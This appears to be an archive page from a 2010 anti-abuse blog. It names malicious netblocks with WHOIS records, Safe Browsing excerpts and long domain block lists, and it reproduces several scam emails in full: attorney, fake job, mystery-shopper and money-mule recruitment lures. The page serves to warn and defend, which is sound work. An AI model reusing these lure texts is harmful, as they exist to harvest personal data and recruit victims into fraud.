Sponsored by..

Wednesday, 20 October 2010

Evil network: MD-ISP-MONITORING, AS25129 (89.187.32.0/19)

AS25129 (89.187.32.0/19) features a lot of refugees from another evil network, Najada. There's nothing of value in this netblock, sites seem to feature illegal software, fake anti-virus, criminal support infrastructure, fake pharma sites and phishing.

The IP range is allocated to:


inetnum:         89.187.52.0 - 89.187.55.255
netname:         MD-ISP-MONITORING
remarks:         INFRA-AW
descr:           Hi-speed users
country:         MD
admin-c:         ABA3-RIPE
tech-c:          ABA3-RIPE
status:          ASSIGNED PA
mnt-by:          MONITORING-MNT
source:          RIPE # Filtered
person:          Alexander Basunov
address:         R&D Centre "Monitoring"
address:         Komsomolskaya 2a
address:         3200 Bendery
address:         Moldova
e-mail:          hostmaster@bendery.md
mnt-by:          MONITORING-MNT
nic-hdl:         ABA3-RIPE
phone:           +37377786335
source:          RIPE # Filtered
% Information related to '89.187.32.0/19AS25129'
route:           89.187.32.0/19
descr:           R&DC Monitoring, PA
origin:          AS25129
mnt-by:          MONITORING-MNT
source:          RIPE # Filtered

The myWOT reputation of these sites is very bad [CSV], my recommendation is that you block 89.187.52.0 - 89.187.55.255 (89.187.32.0/19) or alternatively null route the sites below.

Anonymousstats.com
Storageprotectorx.com
Hostlogarea.in
Blogblogfirst.in
Bestblogbest.in
High-blogicio.eu
High-blogster.eu
High-picicio.eu
Hostspacebest.in
Mega-blogster.eu
Mega-picicio.eu
Mega-picster.eu
Turbo-blogster.eu
Turbo-imagicio.eu
A-lot-of-appz.com
Activation-codes.net
Activationcrack.net
Any-filez.net
Check-4-apps.org
Crack-file.net
Crack-serial-numbers.net
Crack-usa.com
Crackandcrack.com
Crackcrack.net
Crackcrackcrack.net
Crackdelivery.net
Crackdownload.net
Crackkeys.net
Crackorginal.net
Crackpatch.net
Crackpatchkeygen.net
Crackprokeygen.net
Crackrapidshare.net
Cracks-explorer.net
Crackserialcode.net
Crackserialcodes.net
Crackserialkey.net
Crackserialkeygens.net
Crackserialkeys.net
Crackserialnumber.net
Crackserialnumbers.net
Crackshare.net
Cracktrial.net
Crackwin.net
Dlfeed.com
Downloadcracks.net
Fastcrack.net
Fileserialkey.net
Free-serial.net
Freecrackdownload.net
Freekeygencrack.net
Freeserialkey.net
Fullcrackserial.net
Fullkeygen.net
Fullserialcrack.net
Fullserialnumber.net
Fullserialnumbers.net
Getserial.net
Hosthosthost.net
Key-code.net
Keygen-crack.net
Keygen-serial.net
Keygenc.net
Keygencrackpatch.net
Keygenerators.net
Keygenforserial.net
Keygenkeygen.net
Keygenned.com
Keygenpatch.net
Keygens-for-soft.org
Keygenserialcrack.net
Keygenserialnumber.net
Keygenserials.net
Keygensite.net
Keygentrial.net
Keygenwin.net
Keyproduct.net
Killtrial.net
Licensekeygen.net
Maximumwarez.com
Microposters.org
Newserialcracks.net
Numberserial.net
Orginalcrack.net
Patchcrack.net
Registrationcode.net
Registrationkey.net
Registrationkeys.net
Seialkeymaker.net
Serial-codes.net
Serial-crack.net
Serial-key-generator.net
Serial-keygen.net
Serial-keygens.net
Serial-keys.net
Serial-number-crack.net
Serial-numbers-crack.net
Serialcodesfor.net
Serialcrackcodes.net
Serialcrackkeygen.net
Serialkeycodes.net
Serialkeycrack.net
Serialkeygencracks.net
Serialkeygenerator.net
Serialkeygenpro.net
Serialkeygens.net
Serialkeynumber.net
Serialkeynumbers.net
Serialnumbercode.net
Serialnumbercrack.net
Serialnumberfor.net
Serialnumberkeygen.net
Serialnumberscrack.net
Serialpost.net
Serialserial.net
Shared-fro-you.com
Shared-news.net
Soft-dont-stop.org
Softwareserialnumber.net
Softwareserialnumbers.net
Superpagehost.in
Thecrackserial.net
Trusted-warez.com
Vipcrack.net
Warezpad.net
Wincracks.net
Bestwebspace.in
Besthostfree.in
Gigimon.net
Beribegi.com
Beribegi1.com
Googlemaps5.com
Hostnetblog.in
Judatrafic.com
Trafficforalz.com
Trafficforalz.org
Blogareaweb.in
Hostfreearea.in
Firstblogbest.in
Bloghomelog.in
Netnetblog.in
Bestspacelog.in
Firstblogspace.in
Brendonlfile.org
Coderstrin.org
Codesfreling.org
Cripesload.org
Daungradeoffs.org
Falenslaodins.org
Flaasnesfile.org
Fre-lan-fileess.org
Freecodonlaans.org
Frefrefiless.org
Friilasopn.org
Frilandfile.org
Grandisfreshdown.org
Hostsuperarea.in
Internalsfile.org
Jebaunfols.org
Kachaenfailisi.org
Linefirtsfilee.org
Loadslinecod.org
Med-on-downl.org
Media-delison.org
Media-l-file.org
Medlinefils.org
Ogrisfile.org
Oldinfilefree.org
Onl-for-fils.org
Orange-flis.org
Organisupload.org
Qaredline.org
Qwerfileorg.org
Sigruiqwe.org
Skachfiles.org
Traedenopenres.org
Vades-loadec.org
Valdec-lains.org
Youfileoke.org
Allingspl.com
Superbestfirst.in
Allingtramp.com
Freespacehost.in
Statflus4.com
Webhosthost.in
Leninvgorkax.net
Storereturn.cc
Firstclassresults.cc
Fb-cdn1.com
Installs.tv
Msdefender2011.com
Creativetmx.com
Updatetechno.com
Zverolab.com
Mynewpass.com
Downloadcheapsoft.com
Trafficforalz.net
Z0g7yail0.com
Ebayinvoice.com
Ebayitemhosting.com
Paypal-moneypak-processing.com
Backstab.biz
Cardzone.cc
D-9.cc
Ebayitemhosting.net
Megavendor.biz
Check-crypt.com
Check-domain.cn
Samclubclearance.com
Sams-clearance.com
Samsclubcl.com
Samsclubsales.com
Start-domain.cn
Free-image-uploads.com
Human-nature.org
Imagesshack.net
The-imageshack.com
Gsm-seacher-v10.ru
Blackosogs.com
Riverchick.com
Gabstreamj.com
Ecurrencynews.org
Ancoraimages.com
Mmsbonus.com
Everydayer.com
Celebrition.com
Celebritylabor.com
Getimpressed.com
Goldouncemedia.com
Hollywoodmajestic.com
Lincolnfinserv.com
Mcknightportugal.org
Metacaffe.info
Misteriks.net
Nanosolutionssoft.com
Peksone.net
Peree.ru
Tv-onlines.net
Tv-world-online.net
Vaulttech13.cn
Webarh.com
Vk-base.org
Vksledi.ru
Aniroti.com
Aniroti.net
Pharmpills.net
Mediashares.org
Video-shares.com
Video-shares.net
Videoall.net

Attorney scam: Oak Spring Canola Farms

This is a type of scam email that I haven't seen before, in this case targetting lawyers.. especially dumb ones (and I certainly have seen a lot of those before).

From: Thomas Shepherd <oakspringcanolafarms@hotmail.com>
Date: 20 October 2010 02:40
Subject: Representation
   
Counsel,

The management of Oak Spring Canola Farms seek the urgent attention of your law firm in regards to a breach of sale contract. I seek your urgent intervention in this matter because of its urgency, please advise me if this is your area of law practice so i can bring you into the loop. Expect your urgent responds at your earliest time.

Yours Sincerely,

Thomas Shepherd

I don't even know what a Canola Farm is, but the IP address that this originates from is 74.210.20.6 in Canada which is blacklisted for spamming out another scam (via surriel.com)

From: "Bowen Culbert" <culbert.cosmetics@gmail.com>
Subject: JOB OFFER
Date: Mon, 4 Oct 2010 22:09:02 -0400

  CULBERT COSMETICS COMPANY
                      Culbert Cosmetics Company
                        5 Sheddingdean Business Centre
                         Burgess Hill, SussexRH15 8QY =20
                          United Kingdom  =20
                      Phone:  1273906031
Dear Sir/Madam,

I am Mr. Bowen Culbert. I represent Culbert Cosmetics Company based here in United Kingdom. We need company representatives in Europe, America, and Canada. So If you are interested in this business transaction, forward to us your contact information so we can furnish you with the job description. Please if you are interested to work with us in good faith and honesty, get back to us by filling the information below:

Full Names..................
Full Address................
City........................
State.......................
Postal Code.................
Country.....................
sex.........................
Age.........................
Home Phone..................
Cell Phone..................
Fax.........................
Occupation..................
Company Name................

Very Respectfully,

Bowen Culbert
Managing Director
Culbert Cosmetics Company
5 Sheddingdean Business Centre
Burgess Hill, SussexRH15 8QY
United Kingdom 
culbert.cosmetics@gmail.com
Phone:  1273906031

"Culbert Cosmetics Company" is more obviously a scam, so clearly "Oak Spring Canola Farms" is too.

It turns out that scammin lawyers can be quite lucrative, but they do tend to follow established patterns. There's a pretty good repository of attorney email scams, some of which are quite hard to tell apart from genuine client enquiries.

Saturday, 16 October 2010

xshopperjob.com mystery shopper scam

A mystery shopper scam to avoid, from a domain registered in Russia.


Date: 16 October 2010 15:48
Subject: Re: MS Shopper [$800/week]

Thank you for your interest in the MS Shopper position.
Our company conducts surveys and evaluates other companies in order to help them achieve their performance goals.
We offer an integrated suite of business solutions that enables corporations to achieve tangible results in the marketplace.

We get hired by other companies and act like customers to find out how they are handling their services in relation to their customers.
MS Shopping is the most accurate and reliable tool a business can use to gather information regarding their actual customer service performance at the moment of truth.
This moment of truth is not when the staff is on their best behavior because the boss is around - it is when they interact with customers during their normal daily routines.

This is where you, the MS Shopper, come in.
You pose as an ordinary customer and provide feedback of both factual observations (ex...the floor was free of debris)
and your own opinions (ex...I felt that the temperature in the establishment was too cold).

MS Shoppers must remain anonymous. You must act as a regular customer and be careful not to do anything that would reveal you as a shopper.
An inexperienced shopper could tip off the staff to his/her identity by asking for the manager's name for no clear or appropriate reason.
If you are going to be bringing someone with you on the shop, make sure you educate them about the process as well.
Beware that even whispers can be overheard by employees. If anyone notices you are a shopper,
you can bet that word will quickly spread around the establishment and you will get some of the best customer service in town.

No company can afford to have a gap between the promise of quality and its actual delivery, that's why leading corporations look to us,
the nation's premiere MS shopping and customer experience measurement company.

In order for a business to effectively compete in today's economy, they must be prepared to meet the challenge of increasing sales by:
* Retaining existing customers
* Acquiring new customers
* Creating word-of-mouth advocacy
* Improving customer loyalty

Once we have a contract to do so, you would be directed to the company or outlet, and you would be given
the funds you need to do the job(either purchase merchandise or require services), after which you would write a detailed report of your experience.

Examples of details you would forward to us are:
1) How long does it take to get served.
2) Politeness of the attendant.
3) Customer service professionalism.
4) Sometimes you might be required to upset the attendant, to see how they deal with difficult clients.

Then we turn the information over to the company executives and they will carry out their own duties in improving their services.
Most companies employ our assistance when people complain about their services, or when they feel there is a need for them to improve upon their customer service.
Our company partners with you to implement proven MS shop auditing and surveying strategies that provide critical information about customer experiences.

You will be paid a commission of $100 for every duty you carry out, and bonus on your transportation allowance.
Your task will be to evaluate and comment on customer service in a wide variety of restaurants, retail stores, casinos,
shopping malls, banks and hotels in your area.


Qualities of a good MS Shopper:
* Is 21 years of age or older
* Loves to go shopping
* Is fair and objective
* Is ON TIME
* Is very observant and able to focus on details
* Is fairly intelligent
* Has patience
* Is detail oriented
* Is practical
* Types well
* Is trustworthy
* Explains well in writing
* Is discreet
* Loves to learn
* Handles deadlines
* Has full internet access (at home or at work)

MS Shopping is fun and exciting but also must be approached very seriously and is definitely not for everyone.

If you are interested in applying for consideration as a MS Shopper do send in your information: Domiciano@xshopperjob.com
Full Name:
Address:
City:
State:
Zip Code:
Phone Number:
Age:
Occupation:

As soon as we receive your information we will add you to our database and we will look for locations in your area that needs to be evaluated.

The possition is only available for United States.

Thank you,
Domiciano MECHOSO


The domain name is registered in Russia, contact details could well be fake:

Domain Name: XSHOPPERJOB.COM

Registrant:
    Beatles Steel
    Alexey Zhukov        (oloperz@usa.com)
    Novopeschanaya 56 8
    Moscow
    Moscow,145672
    RU
    Tel. +7.4999433354

Creation Date: 15-Oct-2010 
Expiration Date: 15-Oct-2011

Domain servers in listed order:
    ns2.reg.ru
    ns1.reg.ru

Administrative Contact:
    Beatles Steel
    Alexey Zhukov        (oloperz@usa.com)
    Novopeschanaya 56 8
    Moscow
    Moscow,145672
    RU
    Tel. +7.4999433354

Technical Contact:
    Beatles Steel
    Alexey Zhukov        (oloperz@usa.com)
    Novopeschanaya 56 8
    Moscow
    Moscow,145672
    RU
    Tel. +7.4999433354

Billing Contact:
    Beatles Steel
    Alexey Zhukov        (oloperz@usa.com)
    Novopeschanaya 56 8
    Moscow
    Moscow,145672
    RU
    Tel. +7.4999433354


All mail is handled by mx.yandex.ru in Russia, so this does look like a Russian operation. No surprises there.The email address is fairly well known for fraudulent activity too. Avoid.

Friday, 15 October 2010

nttemps.net / ntmps.net / ntmps.com recruitment scam

Net-Temps, Inc is a real company, these emails do not come from Net-Temps, Inc and follow on from a series of fraudulent emails pretending to be from this company. This time around the scammers appear to be using the domains nttemps.net and ntmps.net (update: they are also using ntmps.com)

These so-called jobs are usually money mule (money laundering) operations or some other criminal "back office" activity which should be avoided at all costs.

Date: 15 October 2010 16:48
Subject: Hiring (part-time)

Looking for a job? My name is Juliette Barnes, I am a recruiting manager of NetTemps Inc, a recruiting agency for direct-hire, contract, and freelance professionals within various professions.                          

Today I would like introduce some part-time and virtual office vacancies in the spheres of Advertising, Education, Engineering, Finance, Health care, Information technology, Media, Real estate and Transportation.                                       

If you are interested to learn more about the jobs offered, please get back to me, providing your name and contact number.                        

We are eager to help you find a better job and improve your career!         
If you have questions, please do not hesitate to e-mail me on:
e u r o p e @ n t m p s . n e t      [please delete spaces in the email address before sending it to us]    

Yours sincerely,                             
Juliette Barnes                     
NetTemps Inc                                 
======================================
Mail for these two domains is handled by 67.222.149.107 [BlueSquare Data, UK], nameservers are ns1.dollar-canada.com and ns1.nevoconsulting.net both hosted on 67.23.235.236 [HostDime, Orlando] which are also used by the domains lovestorybook.net and xpharmx.com.

Monday, 11 October 2010

Evil network: Specialist Ltd / Specialist-ISP-PI2 AS48691(194.28.112.0/22)

Specialist Ltd is a fairly large netblock containing a small number of very bad hosts and nothing else. Registered to a company in Moldova, Specialist looks like another part of the Latvia / Moldovan / Bosnian black hat network which supports all sorts of organised crime.

inetnum:         194.28.112.0 - 194.28.115.255
netname:         Specialist-ISP-PI2
descr:           Specialist, Ltd.
country:         MD
org:             ORG-SL206-RIPE
admin-c:         VP2841-RIPE
tech-c:          AB16163-RIPE
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-HM-PI-MNT
mnt-lower:       RIPE-NCC-HM-PI-MNT
mnt-by:          SPECIALIST-MNT
mnt-routes:      SPECIALIST-MNT
mnt-domains:     SPECIALIST-MNT
source:          RIPE # Filtered

organisation:    ORG-SL206-RIPE
org-name:        Specialist, Ltd
org-type:        OTHER
descr:           Specialist, Ltd, Rybnitsa, MD
address:         I. Soltysa 12, Rybnitsa, MD
phone:           +373-777-12921
phone:           +373-693-18189
phone:           +373-777-65071
fax-no:          +373-555-43073
mnt-ref:         MONITORING-MNT
abuse-mailbox:   abuse@lan-rybnitsa.com
mnt-by:          SPECIALIST-MNT
source:          RIPE # Filtered

person:          Vladimir Pilan
address:         I. Soltysa 12, Rybnitsa, MD
phone:           +373-777-12921
fax-no:          +373-555-43073
nic-hdl:         VP2841-RIPE
source:          RIPE # Filtered
mnt-by:          SPECIALIST-MNT

person:          Anatoly Belitsky
address:         I. Soltysa 12, Rybnitsa, MD
phone:           +373-777-65071
fax-no:          +373-555-43073
nic-hdl:         AB16163-RIPE
source:          RIPE # Filtered
mnt-by:          SPECIALIST-MNT

% Information related to '194.28.112.0/22AS48691'

route:           194.28.112.0/22
descr:           Specialst-route2
origin:          AS48691
mnt-by:          SPECIALIST-MNT
source:          RIPE # Filtered


Google's Safe Browsing diagnostics only show part of the story:

Safe Browsing
Diagnostic page for AS48691 (SPECIALIST)

What happened when Google visited sites hosted on this network?

    Of the 28 site(s) we tested on this network over the past 90 days, none served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-10-09, and the last time suspicious content was found was on 2010-10-09.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 3 site(s) on this network, including, for example, 0jiqjmk3.ru/, fngmadopx.ru/, bingosyssaver24.com/, that appeared to function as intermediaries for the infection of 2 other site(s) including, for example, rttattorneys.com/, mygooglephotos.webs.com/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 15 site(s), including, for example, 194.28.112.0/, xebetak.ru/, bingosyssaver24.com/, that infected 865 other site(s), including, for example, slutdrive.com/, stvid.com/, amatura.com/.
The MyWOT reputation of the sites on this network is very bad [CSV]. It is unlikely that this netblock will be used for anything other than evil purposes, so blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea, or block the domains listed below.

Globdomain.ru
Greenter.ru
Photois.org
Style-vk.com
Vkstyle.net
07tqqwem.ru
0jiqjmk3.ru
0qhe7y6o.ru
0scoubpk.ru
0st44x7z.ru
0w6scx6a.ru
1001jimm.ru
23qjmdic.ru
27wuxt37.ru
28iue5ri.ru
28jnbuak.ru
2be-trends.ru
2poaxz3k.ru
2ti0pv3y.ru
2zm5mcep.ru
30zcz8ot.ru
32iafdnp.ru
3a0stbqe.ru
3jruf6nc.ru
40ktc2tn.ru
4hp2ag6c.ru
4jfhywir.ru
4mausx2w.ru
4y8pqcby.ru
5c4aiwcs.ru
5gsco2w5.ru
5q4eyd2w.ru
5znhff2s.ru
6dpg3khy.ru
6ojj8sks.ru
6pgsqndh.ru
777wxpc7.ru
78w88epi.ru
83qndvnj.ru
868r5e0b.ru
8n7pnyyr.ru
8reclame.ru
Alwaysprokladka.com
Artenhart.ru
Artiestenloket.ru
Ashcbzbbbz.ru
Aslkjhqeqw.ru
Atyyyopg.ru
Azaamdwo.ru
Bim6xe3t.ru
Bjpfk0rm.ru
Boskoop2nepal.info
Bossal.info
Bramrozafestival.info
Brand-central.info
Bvo62o0i.ru
Bwzz5c32.ru
C28xd2ck.ru
C6iv0x3j.ru
Cafetariaroyal.info
Cateredchaletfrankrijk.ru
Cf8sagkn.ru
Childsurvival.info
Creedenceclearwatersurvival.info
Crosslinks-services.ru
Csokolom.ru
Cw5k47ye.ru
D6vjbbv6.ru
Damesfutsal.info
Datadigital.info
Dekeukenbouwer.ru
Dotyuzcifl.ru
Duz5n2ca.ru
Dwunvuum.ru
Ea7xh4vw.ru
Ef6j6u0r.ru
F50rbdb8.ru
Farmsurvival.info
Fbbktj2z.ru
Fhlaenyxor.ru
Fimpvs8t.ru
Fppf2h28.ru
Freemobiledns.mobi
Gayq8rgx.ru
Gdwre766.ru
Gopchicken.ru
Gscrystal.info
H6poe6or.ru
Haaglandia-futsal.info
Hc6zxms4.ru
Hem3oxjh.ru
Henness.ru
Hetkwispelaartje.ru
Hotcrystal.info
Huisenenergielabel.info
Hvdwal.info
I4nhjopf.ru
I7in0b64.ru
Ic2u8kk0.ru
Ihbkbzcm.ru
Ihcswgcz.ru
Ihjddgqs.ru
Inventivecapital.info
Io060fcn.ru
Io0yfyc8.ru
J6kb3pfa.ru
J7k6xze2.ru
J7oc5v3o.ru
Jbsc.ru
Jimakolo.ru
Jimm2rusru.ru
Jimmbly.ru
Jimmdlyadjimmru.ru
Jimmdlyasamsa.ru
Jimmdns1.ru
Jimmdns3.ru
Jimmdns4.ru
Jimmdns5.ru
Jimmdnsru.ru
Jimmfanfik.ru
Jimmfantasy2.ru
Jimmfaqru.ru
Jimmforyouru.ru
Jimmfreeru.ru
Jimmgps.ru
Jimmgpsru.ru
Jimmhobbyrus.ru
Jimmhostoryru.ru
Jimmhtcru.ru
Jimmicqlop.ru
Jimmkolipo12.ru
Jimmkonstructru.ru
Jimmlocationrus.ru
Jimmlocationss.ru
Jimmlokolok.ru
Jimmmobru2.ru
Jimmmobru4.ru
Jimmnewsru.ru
Jimmokiloi.ru
Jimmonlineru.ru
Jimmonlinerus.ru
Jimmosuk.ru
Jimmplanetka.ru
Jimmpolice12.ru
Jimmpolomba.ru
Jimmpoloniy.ru
Jimmpozor.ru
Jimmprofile.ru
Jimmprofilerus.ru
Jimmrurus.ru
Jimmsamsungru.ru
Jimmtebepii.ru
Jimmtrahaet.ru
Jimmvmozg.ru
Jimmyblo.ru
Jnano5gh.ru
Jokerjokk.ru
Jongfcmp.ru
Josal.info
Joy-adventure.ru
Kadefestival.info
Kefpvbsi.ru
Kfgemaae.ru
Kleinhengstdael.info
Kojvdspw.ru
Koliander.ru
Langsdewal.info
Liononlinensd.ru
Lipsticpi.ru
Listikjimm.ru
Literatuurfestival.info
Lokipol.ru
Lopolok.ru
Macdental.info
Maruuhp2.ru
Meeenti.ru
Mipolok.ru
Mjbims7m.ru
Mokojikol.ru
Momomom.ru
Mrt0zqcb.ru
Multimediamagazine.ru
Mvanderwal.info
Mxek5t5g.ru
N7wg0g5w.ru
Naaminkristal.info
Noordelijkkoorfestival.info
Nv8os6yt.ru
Nxo48a7g.ru
O3wg4sya.ru
Ocggnaif.ru
Ofz5qzgu.ru
Oh7iumr7.ru
Ohjbkyudil.ru
Ojimmx4.ru
Ojimmx6.ru
Okiolk.ru
Onlinecheapsdo.ru
Onlinefeeds.ru
Onlinefreeze.ru
Onlinegearsd.ru
Onlinegop.ru
Onlinejimmmovse.ru
Onlinejobsfrees.ru
Onlinelongjorn.ru
Onlineonlkiok.ru
Onlinerujimm.ru
Onlineteammaster.ru
Onlinetechnicals.ru
Onlineworkers.ru
Onlinkrt.ru
Oordfestival.info
Orthocapelle.ru
Patronah.ru
Paulvosdewael.info
Petstotal.info
Piscine-ecologique.ru
Pororkol.ru
Praktijkdebergkristal.info
Prc6t7z3.ru
Psxdv0nr.ru
Pvbsiy5y.ru
Q2auv3at.ru
Q3ysg05s.ru
Q8juhmhh.ru
Qbecqe0s.ru
Qec5beqn.ru
Qzhvlpso.ru
Rebootfestival.info
Renarental.info
Retrosensual.info
Rickenchantal.info
Rietfestival.info
Rikosdhu.ru
Ronaldknol.ru
Rs3gpd0m.ru
Rudjimmdjimm.ru
Rvvcoal.info
S4gvhd35.ru
S748eop4.ru
Sadjbamn.ru
Sadjkadkasj.ru
Schutrups.ru
Selavis.ru
Sgivnn0t.ru
Smart-accountant.ru
Spankabel.info
Srowig.ru
Stichtingderevival.info
Stiltefestival.info
Stpf6qpv.ru
Sv4wmtxj.ru
T0a2afyq.ru
T3tzynvj.ru
T8hftjx8.ru
Tinkel-bel.info
Transfusionfestival.info
Trustincompanies.ru
Twqhde3i.ru
U5fyfzjt.ru
Ucf47vnu.ru
Uplcash.com
Vaxlgfsb.ru
Vdmi2fz8.ru
Vecgndv8.ru
Vetstival.info
Vgksry7k.ru
Vicl.info
Vk0urcvu.ru
Vroegop.ru
W8iroomb.ru
Webeval.info
Wiiqiieiqa.ru
Worldfuneral.info
Wsewf0rw.ru
Wyvbe7vg.ru
X7p03g0j.ru
X8zv6433.ru
Xni27ftd.ru
Xthjrgxz.ru
Xu44i03y.ru
Yearsforfan.ru
Yi0ewtmd.ru
Yldpkozfmi.ru
Yo4nyzyc.ru
Yp7o07nq.ru
Z26hggcb.ru
Z7u4wtfe.ru
Zatuhnichmo.com
Zsrd4xj5.ru
Zumbafestival.info
Zxcvsbrds.ru
Zznks8fh.ru
Fijicool.com
1l1i16b0.com
Nl6fa53.com
Fruitboss.ru
Katamizo.info
Promoup.info
Partnerspromo.info
Zumnox.info
Bingosyssaver21.com
Bingosyssaver22.com
Bingosyssaver23.com
Bingosyssaver24.com
Bingosyssaver25.com
Bingosyssaver26.com
Bingosyssaver27.com
Bingosyssaver28.com
Bingosyssaver29.com
Bingosyssaver30.com
Freerobertodefeater.com
Myrobertodefeater.com
Newrobertodefeater.com
Robertodefeater.com
Robertodefeaternow.com
Robertodefeateronline.com
Robertodefeaters.com
Robertodefeatersite.com
Robertodefeaterstore.com
Therobertodefeater.com
Claerprotection11.com
Claerprotection12.com
Claerprotection13.com
Claerprotection14.com
Claerprotection15.com
Claerprotection16.com
Claerprotection17.com
Claerprotection18.com

[Updated] Evil network: Donstroy Ltd AS29557 (194.8.250.0/23)

UPDATE:  this IP range is now used by a completely different organisation, and malicious activity no longer exists and the block is safe to use. However, the post will remain up for research purposes.

Another network worth blocking, Donstroy Ltd appears to be a Latvia entity hosting in Moldova, closely affiliate with Sagade Ltd who are one of the most scummy networks around at the moment.

The WHOIS details show a tell-tale link to Sagade in the email address:

inetnum:         194.8.250.0 - 194.8.251.255
netname:         Donstroy-1
descr:           Donstroy Ltd.
country:         LV
org:             ORG-DL107-RIPE
admin-c:         JS1050
tech-c:          JS1050
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          MNT-DONSTROY
mnt-routes:      MNT-DONSTROY
mnt-domains:     MNT-DONSTROY
source:          RIPE # Filtered

organisation:    ORG-DL107-RIPE
org-name:        Donstroy Ltd.
org-type:        OTHER
address:         Kalinina 19, 6, Bendery, Moldova
e-mail:          sagade95@gmail.com
mnt-ref:         MNT-DONSTROY
mnt-by:          MNT-DONSTROY
source:          RIPE # Filtered

person:          Juris Sahurovs
address:         Rezekne Darzu iela 21
phone:           +37120034981
nic-hdl:         JS1050
e-mail:          sagade95@gmail.com
source:          RIPE # Filtered

% Information related to '194.8.250.0/23AS29557'

route:           194.8.250.0/23
descr:           donstroy-route-1
origin:          AS29557
mnt-by:          MNT-DONSTROY
source:          RIPE # Filtered

Google's Safe Browsing diagnostics are not good:

Safe Browsing
Diagnostic page for AS29557 (ASNOVIFORUM)

What happened when Google visited sites hosted on this network?

    Of the 42 site(s) we tested on this network over the past 90 days, 2 site(s), including, for example, fastprosearch.com/, twilightsex.cz.cc/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-10-10, and the last time suspicious content was found was on 2010-10-10.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 10 site(s) on this network, including, for example, manoso.cz.cc/, noaos1.cz.cc/, sunporno.cz.cc/, that appeared to function as intermediaries for the infection of 31 other site(s) including, for example, business-standard.com/, ddl-blog.org/, onlyteensx.net/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 22 site(s), including, for example, 194.8.251.0/, prostodomen.in/, globalvalidator.cz.cc/, that infected 215 other site(s), including, for example, business-standard.com/, renisyqaqir.freehostking.com/, hetivilesum.freehostking.com/.

A search against MyWOT reputations reveals a concentration of very bad sites (report here), the best thing to do is to block all traffic to 194.8.250.0 - 194.8.251.255 (194.8.250.0/23) and/or the domains listed below:

Girlongirllibido.info
Homeownersinsuranceratings.com
Testertestfree.org
Vmhostingboxx.org
Dscodec.com
Fastprosearch.com
Ttyur.com
Vlopw.com
Bmlsk.com
Bumzc.com
Fjoty.com
Fruuf.com
Hjoty.com
Nwsplt.com
Palcaug.com
Potyur.com
Uoptyr.com
Uprtx.com
Medicpillsana.com
Medicpillsbba.com
Medicpillsbia.com
Medicpillsbta.com
Medicpillscaa.com
Medicpillscea.com
Medicpillscha.com
Medicpillscia.com
Medicpillscka.com
Medicshopnas.net
Medicshopnds.net
Medicshopnks.net
Medicshopnts.net
Medicshopoes.net
Asemedic.net
Astmedic.net
Encmedic.net
Enmedic.net
Frmedic.net
Hismedic.net
Icmedic.net
Intmedic.net
Krmedic.net
Letmedic.net
Medicci.net
Medicdi.net
Medicfr.net
Medicha.net
Mediclg.net
Medicni.net
Medicnr.net
Medicpo.net
Medicpu.net
Medicri.net
Ajeslovshord.com
Akvodhhead.com
Alsodhesedhoujhd.com
Aniarioli.com
Askpressjame.com
Bejokohafder.com
Blackmodhersdep.com
Bodhlearkfil.com
Busyplakdovk.com
Cutyacttin.com
Deheverbejak.com
Dhadhaveopek.com
Dheyherevhole.com
Dovkbackbord.com
Fallanlot.com
Gavilaugddiri.com
Hadakcourse.com
Hojharedokd.com
Kameuspoukd.com
Losdsodemoss.com
Lovioinwdoli.com
Medpillsna1.com
Medpillsna2.com
Medpillsna3.com
Medpillsna4.com
Medpillsna5.com
Medpillsni1.com
Medpillsni2.com
Medpillsni3.com
Medpillsni4.com
Medpillsni5.com
Minanwaut.com
Offobjecdfamoly.com
Okchfudboy.com
Oslakdexampleas.com
Pajeukdolmaok.com
Posekipbrokj.com
Pukdraokclass.com
Redovksay.com
Resdlaujhmoss.com
Savsdadeschul.com
Sduigancdangi.com
Sliicrymuli.com
Stooddandwi.com
Suchjrikoh.com
Travilfuriwdin.com
Addsecovdtook.com
Aoutdonttdrii.com
Assiafull.com
Commoklakjuajemeak.com
Dalkplakdaor.com
Deachhodkear.com
Dhadledad.com
Dhohdhokjearly.com
Dhokjbroujhdmusd.com
Dojcourseleark.com
Domesdopdhousakd.com
Dopmedic.net
Dovardhohdhoh.com
Efimedic.net
Enemedic.net
Feetdoldakayvst.com
Femedic.net
Hamedic.net
Joldiplosd.com
Kodocedoldappear.com
Launflymost.com
Lederbojdhad.com
Letdourwere.com
Lodledellmek.com
Medshopcu1.com
Medshopcu2.com
Medshopcu3.com
Medshopcu4.com
Medshopcu5.com
Medshopde1.com
Medshopde2.com
Medshopde3.com
Medshopde4.com
Medshopde5.com
Muchplakdokly.com
Okcevhekvadch.com
Oldbesdjrik.com
Passourdu.com
Pocdurejudcold.com
Rockdomeacd.com
Rockroundsung.com
Sicondkniwgo.com
Slovkevvell.com
Soldmarkacte.com
Strovkuproad.com
Ukmedicineel.com
Ukmedicineho.com
Ukmedicineit.com
Vadchdeachmokd.com
Vekdhadjrov.com
Vhadreachmusoc.com
Vholevucemay.com
Vokdercarryjod.com
Vordeachsdud.com
Ydeamavturv.com
Advsecsmart.com
Digitall-soft.com
Extrafullprotection.com
Mypc-repair.com
Payforsec.com
Secsmartsuper.com
Smartsecadv.com
Smartsecsuper.com
Smartsecurityadvisor.com
Smartsupersecurity.com
Stable-soft.com
Supersecadvizor.com
Supersecurepay.com
Supersmartantivirus.com
Supersmartsec.com
Bbnhs.com
Bumzec.com
Ddleb.com
Drutp.com
Gasdda.com
Gradtz.com
Hewraq.com
Hgptd.com
Htresq.com
Krclear.com
Nadwq.com
Nmkop.com
Utrvc.com
Vbnrte.info
Kobqq.com
Jgtee.com
Jyiop.com
Mptim.com
Nhytx.com
Ptyre.com
Woptr.com
Yopte.com
Ypuii.com
Checkingassociateeditor.com
Bestcheckingconnect.com
Checking-associate-editor.com
Checking-associate.com
Checkingassociatemembership.com
Checkingconnectdata.com
Checkingconnectnow.com
Checkingconnectshop.com
Cogus.net
Gromz.net
